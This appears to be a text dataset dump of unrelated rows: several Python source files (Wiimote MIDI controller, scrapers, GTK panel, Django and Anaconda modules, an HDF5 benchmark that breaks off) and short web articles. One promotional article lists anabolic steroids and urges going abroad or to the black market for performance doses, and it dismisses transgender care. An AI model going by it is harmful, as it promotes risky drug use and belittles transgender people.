text
stringlengths 29
850k
|
|---|
#!/usr/bin/python
import cwiid
import sys
import time
import pypm
from txosc import osc as OSC
from txosc import sync as SYNC
btn_A = 0x0008
btn_one = 0x0002
btn_two = 0x0001
btn_left = 0x0100
btn_right = 0x0200
btn_up = 0x0800
btn_down = 0x0400
btn_minus = 0x0010
btn_plus = 0x1000
btn_home = 0x0080
btn_shoot = 0x0004
class MIDISender:
def __init__(self,device):
self.midi_out = None
for id in range(pypm.CountDevices()):
interf,name,inp,outp,opened = pypm.GetDeviceInfo(id)
if (outp == 1 and name == device):
self.midi_out = pypm.Output(id,0)
break
if self.midi_out == None:
raise Exception("No output device "+device+" found ...")
def mute(self,channel):
print "muting", channel
for v in range(100,0,-2):
self.midi_out.Write([[[0xb0,channel,v],pypm.Time()]])
time.sleep(0.001)
def unmute(self,channel):
print "unmuting", channel
for v in range(0,100,2):
self.midi_out.Write([[[0xb0,channel,v],pypm.Time()]])
time.sleep(0.001)
def play_jingle(self, n):
print "playing jingle", n
self.midi_out.Write([[[0x90,n,127],pypm.Time()]])
time.sleep(0.1)
self.midi_out.Write([[[0x80,n,0],pypm.Time()]])
def stop_jingles(self):
print "stopping jingles"
self.midi_out.Write([[[0xb0,126,127],pypm.Time()]])
time.sleep(0.1)
self.midi_out.Write([[[0xb0,126,0],pypm.Time()]])
# self.midi_out.Write([[[0xb0,channel,0],pypm.Time()]])
class OSCSender:
def __init__(self,host="localhost",port=3819):
self.sender = SYNC.UdpSender(host,port)
def _simple_msg(self,msg):
self.sender.send(OSC.Message(msg))
def add_marker(self):
self._simple_msg("/add_marker")
def rec_prepare(self):
self.sender.send(OSC.Message("/access_action", "Editor/script-action-2"))
def play(self):
self._simple_msg("/transport_play")
def stop(self):
self._simple_msg("/transport_stop")
midi_sender = MIDISender("Midi Through Port-0")
osc_sender = OSCSender()
class WiiButtonState(object):
def __init__(self):
self.button_state = {
btn_A: False,
btn_one: False,
btn_two: False,
btn_left: False,
btn_right: False,
btn_up: False,
btn_down: False,
btn_minus: False,
btn_plus: False,
btn_home: False,
btn_shoot: False
}
self.button_funcs = {}
def callback(self,messages,time):
for msgType, msgContent in messages:
if msgType != cwiid.MESG_BTN:
continue
self.buttonEvent(msgContent)
def buttonEvent(self,state):
for btn,old_state in self.button_state.items():
new_state = state & btn
if new_state != old_state:
self.button_state[btn] = new_state
if btn in self.button_funcs:
press_func, rel_func = self.button_funcs[btn]
if new_state:
press_func()
else:
rel_func()
class MutingWii(WiiButtonState):
def __init__(self,mutingChannel):
super(MutingWii,self).__init__()
self.mutingChannel = mutingChannel
self.button_funcs[btn_shoot] = (self.mute,self.unmute)
def mute(self):
self.device.led = cwiid.LED1_ON
midi_sender.mute(self.mutingChannel)
def unmute(self):
self.device.led = 0
midi_sender.unmute(self.mutingChannel)
class MasterWii(MutingWii):
def __init__(self,mutingChannel):
super(MasterWii,self).__init__(mutingChannel)
self.button_funcs[btn_one] = (self.jingle1_play,self.leds_off)
self.button_funcs[btn_two] = (self.jingle2_play,self.leds_off)
self.button_funcs[btn_home] = (self.rec_prepare,self.leds_off)
self.button_funcs[btn_A] = (self.set_mark,self.leds_off)
self.button_funcs[btn_up] = (self.play,self.leds_off)
self.button_funcs[btn_down] = (self.stop,self.leds_off)
def jingle1_play(self):
print "Jingle1 play"
self.device.led = cwiid.LED2_ON
midi_sender.play_jingle(0)
def jingle2_play(self):
print "Jingle2 play"
self.device.led = cwiid.LED2_ON
midi_sender.play_jingle(1)
def jingles_stop(self):
midi_sender.stop_jingles()
def rec_prepare(self):
print "Recplay"
self.device.led = cwiid.LED3_ON
osc_sender.rec_prepare()
def play(self):
osc_sender.play()
def stop(self):
osc_sender.stop()
def set_mark(self):
print "Set mark"
self.device.led = cwiid.LED4_ON
osc_sender.add_marker()
def leds_off(self):
self.device.led = 0
def do_nothing():
pass
execfile('device_config')
def make_connections(conns):
for id,instance in devices.items():
if id in conns:
continue
print "Connecting", id,
try:
wiimote = cwiid.Wiimote(id)
print "success",
wiimote.rpt_mode = cwiid.RPT_BTN
print "report buttons",
wiimote.mesg_callback = instance.callback
instance.device = wiimote
wiimote.enable(cwiid.FLAG_MESG_IFC)
conns.append(id)
except:
print "failed"
return conns
if __name__ == "__main__":
conns = []
while True:
make_connections(conns)
time.sleep(1)
|
What are the best legal steroids on earth? This is a very common question, but for many of you, it may be a question you didn't even know was possible. It is often inaccurately assumed that anabolic steroids are outright illegal, but the truth is something rather different. In many countries around the world, to obtain anabolic steroids you only need to visit your local pharmacy. In countries like this, purchasing anabolic steroids is no different from buying Aspirin or a roll of toilet paper. Then we have countries like the United States; countries that have extremely strict anabolic steroid laws. In the U.S., anabolic steroids are classified as Schedule III controlled substances by way of the Steroid Control Act of 1990, later enhanced by the Steroid Control Act of 2004. By this legislation, it is illegal to purchase or possess anabolic steroids without a prescription, and to obtain a prescription you must have a viable medical need. There are many reasons one might obtain a prescription, and if they do they will have the best legal steroids on earth.
If you want the best legal steroids, you're going to need a purpose that is deemed legal; assuming you live in the United States. For years, the most common reasons for obtaining such a prescription was suffering from a severe muscle wasting disease, cancer and aids were both primary. Burn victims are also commonly prescribed, and interestingly enough those who wish to live a transgender lifestyle. In any case, performance enhancement is not deemed a legitimate medical need; it is a desire and one not protected by the law. Of course, the desire to live a transgender lifestyle is not a need, it is a desire, but this is an argument best served for another day. While the above mentioned were for years the only way to obtain a prescription, in recent years other means have been made available, and rightfully so. Millions of men the world over suffer from low testosterone and even total androgen deficiency; in the U.S. alone it is estimated more than five million men suffer from low testosterone, with another twenty-five million or more suffering from Andropause. If you suffer from any of these conditions, and many men have no idea they do, you can easily obtain a prescription for some of the best legal steroids money can buy. Further, because you'll have the best of the best, and legally so, no one can deny you the ability to enjoy the performance boost held within.
Many assume the only legal steroids available are of a pure testosterone nature; it is true; these will be the most common and some of the best legal steroids of all. While various testosterone blends are the most common, there are other anabolic steroids that can aptly be labeled the best legal steroids obtainable with a prescription. Again, testosterone itself is the most common, and perhaps the most important steroid of all, but there are many fine options. In the U.S., the best legal steroids include: • Anadrol (Oxymetholone) – A potent DHT derived anabolic steroid. Used to treat severe muscle wasting conditions and severe osteoporosis. Rarely used for androgen deficiency with the exception of extreme cases. • Anavar (Oxandrolone) – A mild DHT derived anabolic steroid. Commonly prescribed to treat muscle wasting conditions, osteoporosis and combating corticosteroid buildup. Can be used for androgen deficiencies but somewhat rare. • Deca-Durabolin (Nandrolone-Decanoate) – A 19-nor anabolic steroid, used to treat muscle wasting conditions and Renal Disease. Commonly used to increase hemoglobin levels where needed and in recent years a common combatant of Andropause. • Halotestin (Fluoxymesterone) – A Testosterone derivative prescribed for severe androgen deficiency. In any case, this will be the rarest of all prescribed legal steroids that make up the best legal steroids as it can be quite harsh. • Testosterone – The father of all anabolic steroids, the most commonly prescribed in the U.S. is Testosterone-Cypionate. Other common forms include Testosterone-Enanthate, Testosterone-Propionate and to a lesser degree Sustanon-250 and Testosterone-Suspension. Other forms are available as well, but the best of the best include the previously mentioned. In any case, this is the most commonly prescribed anabolic steroid, as it is perfect for every condition in-which anabolic steroids might be prescribed. • Winstrol (Stanozolol) – A DHT derived anabolic steroid prescribed for the treatment of angioedema. Can be prescribed for some specific androgen deficient issues, but is a bit rare in this regard.
If you live in the U.S., as you can see, while obtaining the best legal steroids is possible it can at times be a bit difficult. In any case, if you obtain a prescription you will not be given true performance level doses, and if performance is the desire you're going to have to seek out other options. For this reason, many and by many we mean over six-million in the U.S. alone purchase anabolic steroids for the purpose of performance and on the black market. This is an option, but in the name of legality, it is not the best one. If performance is the goal, and if you want the best legal steroids money can buy you'll always be best served by going to another country to take care of your supplemental needs. There are numerous countries around the world where you can do this, and within the safety of the law.
|
# -*- coding: utf-8 -*-
# Copyright(C) 2013 dud
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
from weboob.tools.backend import Module, BackendConfig
from weboob.capabilities.base import StringField
from weboob.capabilities.gauge import CapGauge, GaugeSensor, Gauge, GaugeMeasure, SensorNotFound
from weboob.tools.value import Value
from weboob.tools.ordereddict import OrderedDict
from .browser import VelibBrowser
__all__ = ['jcvelauxModule']
SENSOR_TYPES = OrderedDict(((u'available_bikes', u'Available bikes'),
(u'available_bike_stands', u'Free stands'),
(u'bike_stands', u'Total stands')))
CITIES = ("Paris", "Rouen", "Toulouse", "Luxembourg", "Valence", "Stockholm",
"Goteborg", "Santander", "Amiens", "Lillestrom", "Mulhouse", "Lyon",
"Ljubljana", "Seville", "Namur", "Nancy", "Creteil", "Bruxelles-Capitale",
"Cergy-Pontoise", "Vilnius", "Toyama", "Kazan", "Marseille", "Nantes",
"Besancon")
class BikeMeasure(GaugeMeasure):
def __repr__(self):
return '<GaugeMeasure level=%d>' % self.level
class BikeSensor(GaugeSensor):
longitude = StringField('Longitude of the sensor')
latitude = StringField('Latitude of the sensor')
class jcvelauxModule(Module, CapGauge):
NAME = 'jcvelaux'
DESCRIPTION = (u'City bike renting availability information.\nCities: %s' %
u', '.join(CITIES))
MAINTAINER = u'Herve Werner'
EMAIL = 'dud225@hotmail.com'
VERSION = '1.1'
LICENSE = 'AGPLv3'
BROWSER = VelibBrowser
STORAGE = {'boards': {}}
CONFIG = BackendConfig(Value('city', label='City', default='Paris',
choices=CITIES + ("ALL",)))
def __init__(self, *a, **kw):
super(jcvelauxModule, self).__init__(*a, **kw)
self.cities = None
def _make_gauge(self, info):
gauge = Gauge(info['id'])
gauge.name = unicode(info['name'])
gauge.city = unicode(info['city'])
gauge.object = u'bikes'
return gauge
def _make_sensor(self, sensor_type, info, gauge):
id = '%s.%s' % (sensor_type, gauge.id)
sensor = BikeSensor(id)
sensor.gaugeid = gauge.id
sensor.name = SENSOR_TYPES[sensor_type]
sensor.address = unicode(info['address'])
sensor.longitude = info['longitude']
sensor.latitude = info['latitude']
sensor.history = []
return sensor
def _make_measure(self, sensor_type, info):
measure = BikeMeasure()
measure.date = info['last_update']
measure.level = float(info[sensor_type])
return measure
def _parse_gauge(self, info):
gauge = self._make_gauge(info)
gauge.sensors = []
for type in SENSOR_TYPES:
sensor = self._make_sensor(type, info, gauge)
measure = self._make_measure(type, info)
sensor.lastvalue = measure
gauge.sensors.append(sensor)
return gauge
def _contract(self):
contract = self.config.get('city').get()
if contract.lower() == 'all':
contract = None
return contract
def iter_gauges(self, pattern=None):
if pattern is None:
for jgauge in self.browser.get_station_list(contract=self._contract()):
yield self._parse_gauge(jgauge)
else:
lowpattern = pattern.lower()
for jgauge in self.browser.get_station_list(contract=self._contract()):
gauge = self._parse_gauge(jgauge)
if lowpattern in gauge.name.lower() or lowpattern in gauge.city.lower():
yield gauge
def iter_sensors(self, gauge, pattern=None):
if not isinstance(gauge, Gauge):
gauge = self._get_gauge_by_id(gauge)
if gauge is None:
raise SensorNotFound()
if pattern is None:
for sensor in gauge.sensors:
yield sensor
else:
lowpattern = pattern.lower()
for sensor in gauge.sensors:
if lowpattern in sensor.name.lower():
yield sensor
def get_last_measure(self, sensor):
if not isinstance(sensor, GaugeSensor):
sensor = self._get_sensor_by_id(sensor)
if sensor is None:
raise SensorNotFound()
return sensor.lastvalue
def _fetch_cities(self):
if self.cities:
return
self.cities = {}
jcontract = self.browser.get_contracts_list()
for jcontract in jcontract:
for city in jcontract['cities']:
self.cities[city.lower()] = jcontract['name']
def _get_gauge_by_id(self, id):
jgauge = self.browser.get_station_infos(id)
if jgauge:
return self._parse_gauge(jgauge)
else:
return None
def _get_sensor_by_id(self, id):
_, gauge_id = id.split('.', 1)
gauge = self._get_gauge_by_id(gauge_id)
if not gauge:
raise SensorNotFound()
for sensor in gauge.sensors:
if sensor.id.lower() == id.lower():
return sensor
|
ToyWatch has popped up at London jewellery store Elkin with a temporary shop for the festive sales period.
Elkin will has installed dedicated ToyWatch cabinets at its store in London’s Covent Garden and has added the brand’s signage to its windows.
As well as the cabinet displays, ToyWatch models are also shown in the shop on wooden hand models along with the store’s jewellery.
Outside of the temporary festive ToyWatch shop, Elkin does not sell any watches but instead specialises solely in its own collections of jewellery.
The ToyWatch pop-up store will run at Elkin until December 18.
Elkin was founded by Eliisa Makin, who had previously worked as a fashion stylist before setting up the jewellery brand.
|
#!/usr/bin/env python
# Copyright 2012 Tomasz Kontusz
#
# This file is part of Spanel.
#
# Spanel is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Spanel is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Spanel. If not, see <http://www.gnu.org/licenses/>.
import argparse
import logging
import sys
import threading
import gtk
import gobject
import dbus
import dbus.service
from dbus.mainloop.glib import DBusGMainLoop
from utils import Enum, GdkLock
# setting DEBUG for pre-main initialization, it will be changed in main()
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
height = 16
Positions = Enum(('TOP', 'BOTTOM'))
class PanelWindow(gtk.Window):
def __init__(self, position=Positions.TOP, widgets=[]):
super(PanelWindow, self).__init__(gtk.WINDOW_TOPLEVEL)
self.set_default_size(gtk.gdk.screen_width(), height)
self.set_type_hint(gtk.gdk.WINDOW_TYPE_HINT_DOCK)
self._box = gtk.HBox()
self.add(self._box)
self.setup_widgets(widgets)
self.show_all()
for w, _ in widgets: # TODO: create widget protocol
if hasattr(w, 'on_visible'):
w.on_visible()
if position == Positions.TOP:
self.move(0, 0)
self.window.property_change("_NET_WM_STRUT", "CARDINAL", 32,
gtk.gdk.PROP_MODE_REPLACE, [0, height, 0, 0])
elif position == Positions.BOTTOM:
self.move(0, gtk.gdk.screen_height()-height)
self.window.property_change("_NET_WM_STRUT", "CARDINAL", 32,
gtk.gdk.PROP_MODE_REPLACE, [0, 0, 0, height])
def setup_widgets(self, widgets):
default_kwargs = {
'expand': False
}
for widget, w_kwargs in widgets:
kwargs = default_kwargs.copy()
kwargs.update(w_kwargs)
self._box.pack_start(widget, **kwargs)
def main():
logger.info('loading configuration')
import conf
debug_levels = ['DEBUG', 'INFO', 'WARNING', 'ERROR']
parser = argparse.ArgumentParser(
description="Simple panel written in Python for holding widgets")
parser.add_argument('--verbosity', '-v', dest='verbosity',
choices=debug_levels, default=None)
args = parser.parse_args()
level = args.verbosity or getattr(conf, 'VERBOSITY', 'INFO')
if level not in debug_levels:
logger.critical('Log level %s not supported!', level)
return 1
logging.basicConfig(level=level)
logger.info('creating panel')
app = PanelWindow(position=getattr(conf, 'POSITION', None),
widgets=getattr(conf, 'WIDGETS', []))
logger.info('starting main loop')
gtk.gdk.threads_init()
with GdkLock():
gtk.main()
if __name__ == '__main__':
main()
|
What’s new in wholesale for 2019?
With Brexit reaching its conclusion (allegedly), several big names settling into new roles and an array of other key issues on the horizon, the next 12 months are big ones for wholesale. But what do some of the industry’s top names expect to be the big talking points for the year ahead?
“With the minimum wage set to increase and the implications of Brexit still uncertain, there’s no denying that 2019 will be tough. However, the falling high-street rents, business rates relief for small businesses, duty rises on wine and tobacco, and minimum pricing on alcohol will help to make the market a more level playing field, which is a huge positive for independent retailers.
“Next year is all about the aftermath of Brexit, although at this point we’re still in the dark as to where we’ll stand in April. If there’s no deal with the EU, we’ll have to negotiate the complicated transition to global WTO trading, which will inevitably include higher tariffs on some goods. Once the decision is known, we’ll be pushing for clarity on movement of goods and labour, and any departure from EU regulations and standards.
“There’s plenty of other regulation to be aware of too. A rise in the National Living Wage in April will hit some wholesalers hard and they’ll benefit less from business rates relief than their customer base. The new duty bands on white ciders will affect many own brands, and Minimum Unit Pricing of alcohol products will come into force in Wales.
“We’ll learn about calorie-labelling requirements due in 2020, and may see a ban on sales of energy drinks to children. On the environmental front, we face some potentially very onerous changes to Packaging Recovery Notes and the first of what’s likely to be numerous restrictions on the use of unrecyclable plastics.
“I recently returned to the industry as Sugro’s MD after 18 months with the co-op movement. The amount of change and consolidation has been immense – not only with Booker and Tesco, but also the major multiples now seeing themselves as wholesalers to fuel capital-light sales expansion as customer trends move away from their big-box model.
“A lot of these changes started in 2018 but will take greater shape and form in 2019. Wholesale is not defined as narrowly as before. This poses challenges for suppliers and wholesalers as channels blur.
“Over the years, we’ve moved from being a foodservice wholesaler to a true business partner to independent caterers. We offer them key services from catering supplies to online-ordering websites and even customer credit via the JJ Mastercard.
“This month, we’re celebrating our 30th anniversary, which is a tremendous achievement for an independent family business, and we plan to be around to support our customers for many years to come. That’s why one of the biggest focuses for us in 2019 will be to continue with our environmental push. This year, we made some great leaps, which included reduced idling in our vehicles by 70% that resulted in a 2% reduction in carbon emissions across our entire fleet. Solar energy now accounts for 13% of all energy used by our London branches and all our sites are MSC certified. We are encouraging the use of biodegradable and compostable packing with our new Eco-Packing range and will continue to grow our vegetarian and vegan offer.
“I certainly think there’ll be an advancement in digital business. I don’t mean just the percentage of transactions, but the level of influence in digital on retailers’ behaviour will increase. I’d also imagine that we’ll see this extended into the foodservice and on-trade sectors, which is quite limited at the moment. So some of the best practice we do about range and execution that are commonplace will start to happen in in those sectors too.
“There’ll also be pressure on cost, regardless of what happens with Brexit. There’ll be more consolidation of effort to take out cost and that’s something Unitas Wholesale wants to do too.
“The short-term challenges for the foodservice industry are significant, and we’ve seen national restaurant operators and independent businesses alike struggle. Brexit dominates, with challenges on labour availability, food inflation, and lower sterling rates.
“However, we remain positive in the medium-term outlook and are investing accordingly. We’ve been planning for a range of scenarios to ensure that Brakes is best placed to help our customers meet the challenges that are to come.
“Consumer demand for eating out, particularly in areas such as healthier fast food and food to go, remains strong and vegan and free-from choice expands rapidly – giving growth opportunities. Consumer consciousness of social and environmental issues, food provenance and lifestyle choices influencing meal occasions continues to rise.
Originally published 11:06am January 15, 2019 , updated 2:27pm January 16, 2019 .
|
from cgi import escape
def preformat(text):
return escape(str(text))
class TagWrapper(str):
tag = None
attributes = None
@classmethod
def _wrap(cls, text):
if cls.attributes:
attrib = ' ' + ' '.join(['{}="{}"'.format(key, value)
for key, value in cls.attributes.items()])
else:
attrib = ''
return '<{tag}{attrib}>{text}</{tag}>'.format(tag=cls.tag,
attrib=attrib,text=text)
def __new__(cls, text):
return super().__new__(cls, cls._wrap(text))
class Italic(TagWrapper):
tag = 'i'
class Oblique(Italic):
pass
class Bold(TagWrapper):
tag = 'b'
class Light(TagWrapper):
tag = 'l'
class Underline(TagWrapper):
tag = 'u'
class Superscript(TagWrapper):
tag = 'sup'
class Subscript(TagWrapper):
tag = 'sub'
class SmallCaps(TagWrapper):
tag = 'span'
attributes = {'style': 'font-variant:small-caps;'}
class Bibliography(str):
bib_prefix = '<div class="csl-bib-body">'
bib_suffix = '</div>'
item_prefix = ' <div class="csl-entry">'
item_suffix = '</div>'
def __new__(cls, items):
output = [cls.bib_prefix]
for text in items:
text = cls.item_prefix + str(text) + cls.item_suffix
output.append(text)
output.append(cls.bib_suffix)
return super().__new__(cls, '\n'.join(output))
|
I recently headed to Nebraska with a good friend and awesome photographer to witness the annual lekking courtship of the Greater Prairie Chicken and the Sharp-tailed Grouse. We had to be good friends and very tolerant of each other as we spent ten mornings in small blinds in close proximity. We did very well, I must say! I have photographed our local Greater Sage Grouse on it’s lek on numerous occasions but wanted to see these two other birds displaying in the sandhills of Nebraska. It was quite a sight and as always: I want more!!
The Greater Prairie Chicken male displays a pair of pinnae (ear like feathers) along with an orange and purple air sac as it produces a soft, low, hooting sound. They also do a short hop-flight with a cackle that sounds as though you may have just entered a jungle. They will battle each other for top spot in the lek. The bird that holds the top spot has most of the breeding honors. They will display to each other casually, but the real “ruckus” happens when a female enters the courtship arena. Suddenly, all of the males are hooting and dancing, sparring with each other as necessary, truly strutting their stuff. The hen wanders through the lek with an indifference to all of them, taking in the attention and checking out the merchandise. A spectacular audible and visual sight!
The Sharp-tailed Grouse is less colorful but no less spectacular. These males entertain their hens on the tops of the sand hills. They have a smaller air sac but it is colored a bright purple. They display with wings spread, air sac puffed, and yellow eyebrows raised. Stomping their feet, they will all go into a display position and synchronize their moves with the top male initiating the start. Crazy sounds are made by all consisting of hoots and snapping of tail feathers; as usual a flurry of activity comes into play with the presence of a female.
These two birds are truly something to see on their spring courting arenas. Like a number of our other native birds, their demise will be the loss of habitat. Historically, the grasslands they need have been under siege for a long time, shrinking the available habitat and thus decreasing their numbers. Conservation programs are coming into place and efforts are being made to preserve or restore the native prairies. May enough Americans find these birds worthy of saving!
|
# Amara, universalsubtitles.org
#
# Copyright (C) 2013 Participatory Culture Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see
# http://www.gnu.org/licenses/agpl-3.0.html.
from django import template
from django.db.models.query import QuerySet
from django.db.models import Model
from search.forms import SearchForm
from videos.models import Video
register = template.Library()
@register.inclusion_tag('search/_search_form.html', takes_context=True)
def search_form(context, form=None, simple=False):
return {
'simple': simple,
'form': form or SearchForm()
}
@register.simple_tag
def load_related_for_result(search_qs):
#should be fixed in future if result will contain not only Video
from videos.models import SubtitleLanguage
videos = []
for obj in search_qs:
if not obj:
continue
if isinstance(obj, Model):
videos.append((obj.id, obj))
else:
videos.append((obj.object.id, obj.object))
videos = dict(videos)
langs_qs = SubtitleLanguage.objects.select_related('video', 'last_version').filter(video__id__in=videos.keys())
if videos:
for v in videos.values():
v.langs_cache = []
for l in langs_qs:
videos[l.video_id].langs_cache.append(l)
return ''
|
Legal Closing is interpreted as: “Conveyance of title from seller to buyer and the proceeds dispersed to the seller”. In Washington State, closing is considered the day that the deed is recorded in the buyers’ names and the proceeds are paid to the seller. When they can take legal possession of the property depends upon the terms or conditions of the contract.
Different state handle closing procedures in different ways. In Washington, buyers and sellers sign at separate times, typically two to three days prior to the stated closing date. Closings are predominately handled by escrow companies, although some prefer to use attorneys.
Prior to signing, the escrow company will set an appointment with you to come in and sign documents. It can be done at their office or your home. They will also give you the total amount of funds you will receive. These funds are usually dispersed in the form of a certified or cashiers check or can be wired to your designated bank. The closing broker (escrow) will then process the paperwork and send to the King County Courthouse the appropriate documents. Once the courthouse has processed and assigned recording numbers, they will notify escrow who will place a call to all parties that the transaction has recorded.
As far as possession is concerned, this can get very vague and confusing when it really shouldn’t be. Legal possession can only occur when the deed is recorded and funds disbursed. The gray area is what time of day is this going to occur. 9am? Noon? 2pm? To protect everyone’s interest, this specification can be mentioned on the purchase and sale agreement. If nothing has been agreed upon, 9pm is the legal possession time.
|
__author__ = 'juraseg'
from scrapy.spider import BaseSpider
from scrapy.selector import HtmlXPathSelector
from scrapy.http import Request
from product_spiders.items import Product, ProductLoader
import logging
class ComeCoUkSpider(BaseSpider):
name = 'comet.co.uk'
allowed_domains = ['comet.co.uk']
start_urls = (
'http://www.comet.co.uk/',
)
search_url = 'http://www.comet.co.uk/webapp/wcs/stores/servlet/SearchResultsDisplayView?storeId=10151&catalogId=10002&langId=-1&searchTerm='
keywords = ['Sagemcom', 'Sagem']
products = [
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-HDR-FOX-T2-Freeview-freesat-Recorder/680052',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-HDR-FOX-T2/1TB-Freeview-freesat-Recorder/735736',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-FOXSAT-HDR500-Freeview-freesat-Recorder/712930',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-PANASONIC-DMR-HW100EBK-Freeview-freesat-Recorder/767913',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SAMSUNG-SMT-S7800-Freeview-freesat-Recorder/701467',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SAGEMCOM-RTI90-320-Freeview-freesat-Recorder/621994',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-HUMAX-PVR9300T/500-Freeview-freesat-Recorder/787388',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SONY-SVRHDT500B.CEK-Freeview-freesat-Recorder/700665',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-SAGEMCOM-RTI95-320-Freeview-freesat-Recorder/664121',
'http://www.comet.co.uk/p/Freeview-freesat-Recorders/buy-PHILIPS-HDTP8530-Freeview-freesat-Recorder/600339',
]
def start_requests(self):
for keyword in self.keywords:
url = self.search_url + keyword
request = Request(url, callback=self.parse_search)
yield request
for url in self.products:
yield Request(url, callback=self.parse_product)
def parse_product(self, response):
hxs = HtmlXPathSelector(response)
url = response.url
name = hxs.select("//div[@id='product-content']//div[@id='product-header']/h1//text()").extract()
if not name:
logging.error("ERROR! NO NAME! %s" % url)
return
name = " ".join(name)
price = hxs.select("//div[@id='product-content']//div[@id='productPrice']//p[@id='product-price']/text()").extract()
if not price:
logging.error("ERROR! NO PRICE! %s %s" % (url, name))
return
price = price[0]
l = ProductLoader(item=Product(), response=response)
l.add_value('identifier', name)
l.add_value('name', name)
l.add_value('url', url)
l.add_value('price', price)
yield l.load_item()
def parse_search(self, response):
hxs = HtmlXPathSelector(response)
# parse pages
pages = hxs.select("//ul[@id='pagination']/li/a/@href").extract()
for page in pages:
request = Request(page, callback=self.parse_search)
yield request
# parse products
items = hxs.select("//div[@class='column_one grid_list']/div")
for item in items:
name = item.select("div/div[@class='info']/div/h2/a/text()").extract()
if not name:
continue
name = name[0]
url = item.select("div/div[@class='info']/div/h2/a/@href").extract()
if not url:
logging.error("ERROR! NO URL! URL: %s. NAME: %s" % (response.url, name))
continue
url = url[0]
price = item.select("div/div[@class='pricebox']/p[@id='product-price']/text()").extract()
if not price:
logging.error("ERROR! NO PRICE! URL: %s. NAME: %s" % (response.url, name))
continue
price = price[0]
l = ProductLoader(item=Product(), response=response)
l.add_value('identifier', name)
l.add_value('name', name)
l.add_value('url', url)
l.add_value('price', price)
yield l.load_item()
|
Du kan ringe til os 24-timer i døgnet, alle ugens dage.
Dalhoff Travel has compiled a series of links in which you will find information on everything from vaccines and VISAs, to flight schedules and packing tips.
All online payments are handled by ePay. All communications and data are encrypted.
It is a good idea to be well prepared to ensure a successful journey. Read DRF Travel advice.
Tina Dalhoff created a thriving travel agency for businesses with five other staff members and won the Gazelle Award for two consecutive years.
Tina Dalhoff, was born and raised in Holbaek, Denmark. After working in this industry for 27 years with Travel Center A / S, Skibby Business Travel and FDM Travel in Holb�k, she accomplished her dream of starting her own travel agency for businesses.
|
#
# Factory class to create sources.
#
# Copyright (C) 2020 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
from pyanaconda.modules.payloads.constants import SourceType
__all__ = ["SourceFactory"]
class SourceFactory(object):
"""Factory to create payload sources."""
@staticmethod
def create_source(source_type: SourceType):
"""Create a source module.
:param source_type: a source type
:return: a source module
"""
if source_type == SourceType.LIVE_OS_IMAGE:
from pyanaconda.modules.payloads.source.live_os.live_os import LiveOSSourceModule
return LiveOSSourceModule()
elif source_type == SourceType.CDROM:
from pyanaconda.modules.payloads.source.cdrom.cdrom import CdromSourceModule
return CdromSourceModule()
if source_type == SourceType.HMC:
from pyanaconda.modules.payloads.source.hmc.hmc import HMCSourceModule
return HMCSourceModule()
raise ValueError("Unknown source type: {}".format(source_type))
|
Bandaid Packaged Deals - Buy an assortment at one low price!
Order an assortment of quality adhesive bandages (Bandaids) at one low price.
6300 - 100 Heavy Duty Fabric Strip Bandages 7/8" x 3"
6302 - 40 Heavy Duty Fabric Fingertip Bandages 1 3/4" x 2"
6304 - 40 Heavy Duty Fabric Knuckle Bandages 2" x 3"
6306 - 25 Heavy Duty Large Patch Bandages 2" x 3"
Heavy Duty Fabric Fingertip Bandage - 1 3/4" x 2 "
Heavy Duty Fabric Strip Adhesive Bandages 7/8" x 3"
|
"""Small benchmark on the effect of chunksizes and compression on HDF5 files.
Francesc Alted
2007-11-25
"""
from __future__ import print_function
import os
import math
import subprocess
import tempfile
from time import time
import numpy
import tables
# Size of dataset
# N, M = 512, 2**16 # 256 MB
# N, M = 512, 2**18 # 1 GB
# N, M = 512, 2**19 # 2 GB
N, M = 2000, 1000000 # 15 GB
# N, M = 4000, 1000000 # 30 GB
datom = tables.Float64Atom() # elements are double precision
def quantize(data, least_significant_digit):
"""Quantize data to improve compression.
data is quantized using around(scale*data)/scale, where scale is
2**bits, and bits is determined from the least_significant_digit.
For example, if least_significant_digit=1, bits will be 4.
"""
